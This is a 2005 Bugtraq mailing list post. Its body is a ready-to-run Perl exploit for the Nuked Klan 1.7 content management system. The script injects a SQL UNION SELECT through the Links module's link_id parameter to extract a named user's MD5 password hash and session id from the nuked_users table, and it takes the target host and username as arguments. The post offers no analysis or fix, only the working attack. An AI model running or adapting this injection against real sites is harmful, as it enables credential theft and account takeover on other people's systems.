Nuked klan 1.7: Remote Exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Nuked klan 1.7: Remote Exploit
From: papipsycho@xxxxxxxxxxx
Date: 24 Oct 2005 10:23:05 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#!/usr/bin/perl
use LWP::Simple;
 
if (@ARGV != 2)
{
print "\n Nuked klan 1.7: Remote Exploit\n";
print "---------------------------------------------\n\n";
print " Coded By Papipsycho for G00t R0t ?       \n Contact: 
papipsycho@xxxxxxxxxxx\n\n";
print "[!] usage: perl $0 [host] [user]\n";
print "[?] exam: perl $0 http://127.0.0.1/nk/ papipsycho\n\n";
print "Result:\n";
print "[+]user: papipsycho\n";
print "[+]pass(md5): 05632060d4357d8927n28df514a1fb27\n";
print "[+]id: sliN4piN4t6r4tirlX6b\n\n";
print "---------------------------------------------\n\n";
exit ();
}

$adr = $ARGV[0]; # http://127.0.0.1/nk/
$user = $ARGV[1]; # user

$phase1 = "index.php?file=Links&op=description&link_id=1' UNION SELECT id, 
pass, pseudo, id, pass ,mail, niveau, count FROM `nuked_users` where pseudo = 
'";
$phase2 = "' ORDER BY id DESC /*";
$url = $adr.$phase1.$user.$phase2;
$content = get($url);
print "[+]user: $user\n";
print "[+]pass(md5): ";
print $content =~ /(\w{32})/;
print "\n[+]id: ";
print $content =~ /(\w{20})/;

Prev by Date: File Including In FLAT NUKE
Next by Date: php < 4.4.1 htaccess apache dos
Previous by thread: File Including In FLAT NUKE
Next by thread: php < 4.4.1 htaccess apache dos
Index(es):
- Date
- Thread